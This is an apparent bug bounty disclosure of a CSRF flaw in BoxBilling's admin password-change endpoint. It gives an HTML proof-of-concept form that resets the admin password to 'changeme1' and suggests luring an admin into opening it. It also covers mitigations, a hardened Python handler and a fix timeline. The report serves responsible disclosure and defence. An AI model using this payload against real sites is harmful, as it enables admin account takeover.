Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling

Valid

Reported on

Jul 5th 2021


✍️ Description

CSRF on the change-password function of an admin account: the request carries no token and no other anti-CSRF protection is implemented.

🕵️‍♂️ Proof of Concept

Create an .html file (poc.html, for example) and paste the following code into it. Change localhost to your domain or IP address.

<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/box/api/admin/profile/change_password" method="POST">
<input type="hidden" name="password" value="changeme1" /><br />
<input type="hidden" name="password_confirm" value="changeme1" /><br />
<input type='submit' value='Click here' />
</form>
</body></html>

Send this file to an admin; when he opens it and clicks the button, the password is changed to changeme1. See the screenshot below with a Burp request of what is happening.

💥 Impact

This vulnerability is capable of changing the admin password to a new one. If you send the admin the link and he clicks on it, the password is changed directly because there is no CSRF protection. With this attack you can become an admin on the website.

💥 Mitigation

Verify the old_password first.

Implement anti-CSRF protection (a per-session token checked on every state-changing request).
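The two mitigations above, as an added illustration that is not BoxBilling's own code: a stand-alone handler for the change_password endpoint that requires a synchronizer token and the current password before accepting a new one. The in-memory SESSION/ADMIN dicts and the form field name csrf_token are assumptions for the example.

```python
import hashlib, hmac, os, secrets

# Constructed in-memory stand-ins for the session store and the admin record;
# the real BoxBilling storage layer is not modelled here.
SESSION = {}
ADMIN = {}

def _hash_pw(pw, salt):
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)

def set_password(pw):
    salt = os.urandom(16)
    ADMIN["salt"], ADMIN["hash"] = salt, _hash_pw(pw, salt)

def verify_password(pw):
    return hmac.compare_digest(_hash_pw(pw, ADMIN["salt"]), ADMIN["hash"])

def issue_csrf_token():
    """Synchronizer token: random per session, kept server-side and
    embedded as a hidden field in the legitimate change-password form."""
    token = secrets.token_urlsafe(32)
    SESSION["csrf_token"] = token
    return token

def change_password(form):
    """Hardened handler for /api/admin/profile/change_password.
    Returns (HTTP status, message)."""
    expected = SESSION.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # 1. Anti-CSRF: a token must be present and match the session copy
    #    (constant-time compare); a used token is dropped so it cannot be replayed.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    SESSION.pop("csrf_token")
    # 2. Re-authenticate: the caller must prove knowledge of the current password.
    if not verify_password(form.get("old_password", "")):
        return 403, "old_password does not match"
    # 3. Ordinary validation of the new password.
    new = form.get("password", "")
    if len(new) < 12 or new != form.get("password_confirm"):
        return 400, "new password too short or confirmation mismatch"
    set_password(new)
    return 200, "password changed"

if __name__ == "__main__":
    set_password("correct horse battery")
    # The PoC form from the report sends only password/password_confirm: rejected.
    print(change_password({"password": "changeme1", "password_confirm": "changeme1"}))
    # A form rendered for the logged-in admin carries the token and old password: accepted.
    tok = issue_csrf_token()
    print(change_password({"csrf_token": tok, "old_password": "correct horse battery",
                           "password": "a-much-longer-new-secret",
                           "password_confirm": "a-much-longer-new-secret"}))
```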

💥 References

https://owasp.org/www-community/attacks/csrf

https://portswigger.net/web-security/csrf

Occurrences

We have contacted a member of the boxbilling team and are waiting to hear back 5 months ago
Mr. Timothy G Webb Sr. validated this vulnerability 4 months ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mr. Timothy G Webb Sr. confirmed that a fix has been merged on 42cde7 4 months ago
Benjamin Aerni has been awarded the fix bounty
Jamie Slome
3 hours ago

Admin


Just for reference, I added @bennottelling as the fixer to this report and this has been confirmed by the maintainers.